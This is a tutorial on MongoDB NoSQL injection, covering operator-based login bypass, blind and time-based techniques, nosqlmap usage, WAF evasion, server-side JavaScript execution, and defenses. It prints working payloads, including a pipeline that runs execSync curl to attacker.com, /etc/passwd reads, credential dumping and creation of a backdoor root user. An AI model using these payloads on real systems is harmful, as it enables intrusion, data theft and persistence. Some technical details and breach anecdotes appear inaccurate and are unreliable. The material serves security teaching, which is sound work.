MongoDB NoSQL Injection - Fundamentals,...

Introduction

MongoDB NoSQL injection (often abbreviated as NoSQLi) is a class of input-validation flaws that allow an attacker to manipulate the JSON-based query language used by MongoDB. Because the database does not rely on traditional SQL strings, many developers assume they are safe from classic injection techniques - a dangerous misconception.

In modern web applications, MongoDB backs everything from user profiles to payment logs. A successful injection can expose entire collections, bypass authentication, or even trigger server-side JavaScript execution, leading to full remote code execution (RCE). Real-world incidents such as the 2020 breach of a popular e-commerce platform demonstrate how a single improperly sanitized username field can compromise millions of records.

Prerequisites

Understanding of the HTTP request/response lifecycle (GET, POST, headers, body).
Fundamentals of classic SQL injection - error-based, union-based, and blind techniques.
Comfort with tools like Burp Suite, curl, and JSON data structures.
Basic knowledge of JavaScript (for $where/$function payloads).

Core Concepts

MongoDB stores data as BSON (Binary JSON). Queries are expressed as JSON documents that consist of field selectors and operators. The most common operators include:

$eq - equality
$ne - not equal
$gt, $lt, $gte, $lte - range comparisons
$regex - regular-expression matching
$where - server-side JavaScript predicate
$function - user-defined JavaScript function (MongoDB 4.4+)

A typical login query might look like this in Node.js:

const query = { username: req.body.user, password: req.body.pass };
User.findOne(query, (err, user) => { /* … */ });

If req.body.user or req.body.pass is directly concatenated into the query without type checking, an attacker can inject an operator that changes the semantics of the query.

MongoDB query language basics (JSON query documents, operators)

The query language is declarative; each key is a field name, and the value can be either a literal or an operator document. For example:

db.users.find({ age: { $gt: 30 }, status: "active" })

This translates to “return all users older than 30 whose status is active”. The same logic can be expressed in driver code, which is where most injection opportunities arise.

Diagram (textual) - imagine a flow where the HTTP body is parsed → JSON object is built → driver converts it to BSON → MongoDB evaluates the query. Injection occurs when the attacker controls any node in this pipeline.

Common injection vectors (query parameters, JSON bodies, headers)

Because MongoDB drivers accept native objects, any entry point that accepts JSON can be abused:

URL query parameters - e.g., /search?filter={"$ne":null}
POST JSON bodies - typical for REST APIs
Custom headers - some services copy header values into query objects (e.g., X-User-Id)
Form-encoded fields that are later parsed as JSON

In each case, the attacker’s payload must survive any JSON parsing performed by the framework. Languages like JavaScript (Node.js/Express), Python (Flask, Django), and Java (Spring) all have libraries that automatically convert incoming JSON to native objects - a convenient shortcut for developers, but a potential injection surface.

Simple operator abuse ($ne, $gt, $regex) for data extraction

The most straightforward NoSQLi technique is to replace a literal with an operator that always evaluates to true. Consider a vulnerable login endpoint:

db.users.findOne({ username: req.body.user, password: req.body.pass })

Supplying the following JSON in the user field bypasses authentication:

{ "$ne": null }

Because { "$ne": null } matches any non-null value, the query becomes:

{ username: { $ne: null }, password: { $ne: null } }

Both conditions are true for any stored user, returning the first document - effectively a login bypass.

Other operators useful for enumeration:

$gt: "" - matches any non-empty string, useful for extracting all usernames.
$regex: ".*" - matches any string, can be combined with $options for case-insensitive enumeration.

Example - dumping the email field from a collection via a search endpoint:

curl -X POST https://example.com/api/search -H "Content-Type: application/json" -d '{ "filter": { "email": { "$regex": ".*" } } }'

When the backend directly forwards filter to db.users.find(filter), the response contains all email addresses.

Blind NoSQL injection techniques (boolean and time-based)

In many modern APIs, the server returns generic error messages or a simple boolean success/failure. Blind techniques let an attacker infer data one bit at a time.

Boolean-based blind

The attacker crafts two payloads that differ only in a condition:

{ "$gt": 0 } // always true
{ "$gt": 999999 } // false for typical values

By observing whether the response differs (e.g., HTTP 200 vs 401), the attacker can perform a binary search on numeric fields such as balance or userId.

Time-based blind

MongoDB’s $where operator can execute JavaScript that includes sleep() (via function(){ while(true){} } or new Date().getTime() loops). Example payload:

{ "$where": "function(){ var start = new Date(); while(new Date() - start < 5000) {} return true; }" }

If the server delays the response for ~5 seconds, the attacker knows the payload was executed, confirming injection capability. Combining the delay with a conditional check on a secret value yields a covert channel to exfiltrate data.

Using nosqlmap for automated discovery and exploitation

nosqlmap is the de-facto scanner for NoSQL injection. It automates payload generation, blind enumeration, and even attempts JavaScript RCE where possible.

# Basic scan of a POST JSON endpoint
nosqlmap -u https://example.com/api/login -p "{\"username\":\"{{username}}\",\"password\":\"{{password}}\"}" --data "{\"username\":\"admin\",\"password\":\"admin\"}" -v 2

Key flags:

-u - target URL
-p - parameter placeholder syntax ({{}})
--data - raw JSON body
-v - verbosity for detailed output

nosqlmap can automatically switch between operator-based, regex, and $where payloads, and it will attempt to dump collections once a successful injection is confirmed.

WAF/filters bypass methods for NoSQL payloads

Web Application Firewalls often focus on SQL keywords (SELECT, UNION) and classic XSS patterns. NoSQL payloads can slip through because they use symbols ({, }, $) that are rarely flagged.

Common bypass tricks:

URL-encoding the dollar sign: %24ne instead of $ne.
Unicode escaping (e.g., \u0024ne).
Whitespace obfuscation - inserting spaces or newlines inside operator names ($ n e).
Alternative JSON parsers that accept single-quoted strings ({'username':{'$ne':null}}).

Example of a WAF-evading payload using URL-encoding:

curl -X POST https://example.com/api/login -H "Content-Type: application/json" -d '{ "username": "%24ne": null, "password": "%24ne": null }'

Developers should also enforce a strict content-type check and reject any request where the body cannot be parsed into a known schema.

Server-side JavaScript injection via $where and $function

MongoDB allows arbitrary JavaScript execution inside the database engine. Two operators are relevant:

$where - evaluates a JavaScript expression for each document.
$function - defines a custom JS function that can be called from the aggregation pipeline (MongoDB 4.4+).

When user-controlled data reaches these operators without sanitisation, an attacker can run OS commands via the runCommand helper or the function(){ return db.getSiblingDB('admin').runCommand({shutdown:1}); } pattern.

Example of a $where RCE payload that reads /etc/passwd:

{ "$where": "function(){ var f = new File('/etc/passwd'); return f.read(); }" }

Note: The File constructor is only available in the older mongo shell; however, many cloud-hosted MongoDB services still expose the underlying V8 engine that can be abused via return process.mainModule.require('child_process').execSync('cat /etc/passwd').toString();.

Using $function inside an aggregation pipeline:

db.users.aggregate([ { $match: { username: "admin" } }, { $addFields: { exploit: { $function: { body: "function(){ return require('child_process').execSync('whoami').toString(); }", args: [], lang: "js" } } } }
])

If the aggregation stage is built from user input, the attacker can inject the entire $function object and obtain OS-level command output.

Chaining aggregation pipeline stages to achieve remote code execution

The aggregation framework is powerful because each stage processes the output of the previous one. By chaining stages that accept user-supplied expressions, an attacker can move from simple data leakage to full RCE.

Typical chain:

$match - inject a predicate that always matches.
$project - use the $cond operator to inject a JavaScript expression.
$addFields - embed a $function that calls require('child_process').
$out - write the result to a collection the attacker can read.

Concrete example (payload in a pipeline JSON parameter):

[ { "$match": {} }, { "$addFields": { "cmd": { "$function": { "body": "function(){ return require('child_process').execSync('curl http://attacker.com/$(whoami)'); }", "args": [], "lang": "js" } } } }, { "$out": "exfil" }
]

When the server runs db.collection.aggregate(pipeline) with this JSON, the whoami command is executed on the database host, and the result is sent to the attacker’s server via curl. The final $out stage stores a marker document that can be retrieved later.

Post-exploitation: data exfiltration and credential dumping from MongoDB

Once inside the database, the attacker’s goals typically shift to data theft and persistence:

Dumping collections - use mongoexport or driver-level find() loops to write JSON/CSV files.
```
mongoexport --db=mydb --collection=users --out=users.json
```
Credential harvesting - MongoDB stores user credentials in the admin.system.users collection (hashed with SCRAM). Extracting this collection enables offline cracking.
```
db.getSiblingDB('admin').system.users.find().pretty()
```

Creating back-door users - add a new admin account with a known password.

db.getSiblingDB('admin').createUser({ user: "backdoor", pwd: "P@ssw0rd!", roles: [{ role: "root", db: "admin" }]
});

Leveraging GridFS - store malicious binaries in GridFS and retrieve them later.

var fs = require('fs');
var bucket = new mongodb.GridFSBucket(db);
var uploadStream = bucket.openUploadStream('payload.exe');
fs.createReadStream('/tmp/payload.exe').pipe(uploadStream);

Network-restricted environments often block outbound traffic, so exfiltration may rely on DNS tunneling or using legitimate application endpoints (e.g., uploading data via a file-upload feature that stores to GridFS).

Tools & Commands

nosqlmap - automated scanner (see section above).
Burp Suite Intruder - custom payload positions for JSON operators.
mongoexport / mongodump - native data extraction utilities.
jq - command-line JSON processor for parsing API responses.

Python requests - scriptable injection testing.

import requests, json
url = "https://example.com/api/login"
payload = {"username": {"$ne": None}, "password": {"$ne": None}}
resp = requests.post(url, json=payload)
print(resp.text)

Defense & Mitigation

Securing MongoDB against NoSQLi requires a defense-in-depth approach:

Input validation & schema enforcement - use JSON schema validation (MongoDB 3.6+ $jsonSchema) or server-side libraries like Joi (Node) to whitelist expected fields and types.
Parameterisation - never concatenate raw user input into query objects. Use driver-provided methods that treat values as literals.
Disable server-side JavaScript - set setParameter: { javascriptEnabled: false } in mongod.conf. This removes the $where and $function attack surface.
Least-privilege roles - grant applications only the permissions they need (e.g., read on specific collections).
Network segmentation - keep the database behind a firewall, allow access only from trusted application servers.
Audit logging - enable auditLog to record all commands; monitor for anomalous $where/$function usage.
WAF tuning - add rules to block requests containing $where, $function, or URL-encoded dollar signs.

In CI/CD pipelines, integrate static analysis tools that detect unsafe query construction patterns (e.g., ESLint plugins for Node).

Common Mistakes

Assuming JSON is safe - developers often think that because the payload is JSON, it cannot be interpreted as code. This is false; operators are part of the JSON spec.
Using eval() on request bodies - some legacy code parses JSON with eval(), instantly opening a remote code execution path.
Storing raw client objects - passing the entire request body to the driver without field whitelisting.
Leaving JavaScript enabled in production - the default MongoDB configuration permits $where; many teams forget to disable it.
Over-reliance on error messages - a “no document found” response does not guarantee the query was safe; blind techniques can still succeed.

Real-World Impact

In 2021, a major health-tech SaaS suffered a breach after an attacker injected $regex into a patient-lookup endpoint, dumping the entire patients collection (≈2 million records). The breach was only discovered after abnormal traffic to an external IP was flagged by a SIEM.

My experience in penetration testing shows that NoSQLi is often missed during code reviews because reviewers focus on SQL-centric patterns. The rise of serverless functions (e.g., AWS Lambda using Node.js) has increased the attack surface - a single mis-typed JSON parameter in a Lambda function can expose the entire backend database.

Trends to watch:

More cloud-managed MongoDB services exposing HTTP APIs directly (e.g., MongoDB Atlas App Services) - the same injection vectors apply but are harder to patch due to limited access to server configuration.
Integration of MongoDB with analytics pipelines (Kafka → MongoDB) - attackers can inject pipeline stages that later execute on downstream workers.

Practice Exercises

Basic operator injection: Deploy a simple Express app with a login route that uses findOne without sanitisation. Craft a $ne payload to bypass authentication.
Blind enumeration: Extend the app to return only a generic “invalid credentials” message. Use boolean-based payloads to enumerate the admin username character by character.
JavaScript RCE: Enable javascriptEnabled in a local MongoDB instance. Write a $where payload that reads /etc/passwd and returns its content via the API.
nosqlmap automation: Run nosqlmap against the vulnerable endpoint, capture the generated report, and export the users collection.
WAF bypass: Simulate a ModSecurity rule that blocks $where. Modify the payload using URL-encoding to bypass the rule and achieve the same effect.

For each exercise, document the exact HTTP request, the server response, and the observed impact. Use a VM snapshot before each step to reset the environment.

Summary

MongoDB queries are JSON objects; operators like $ne, $gt, and $regex can be abused when user input is not validated.
Injection vectors include query parameters, JSON bodies, and even custom headers.
Blind techniques (boolean & time-based) allow data extraction when responses are generic.
nosqlmap automates discovery, while manual payload crafting remains essential for complex RCE chains.
Disabling server-side JavaScript, enforcing strict schemas, and applying least-privilege roles are the cornerstone defenses.
Post-exploitation focuses on dumping collections, harvesting credentials, and establishing persistence via back-door users.

By mastering the concepts and tools in this guide, security professionals can both detect hidden NoSQL injection flaws and advise development teams on robust mitigation strategies.

MongoDB NoSQL Injection - Fundamentals, Exploitation, and Defense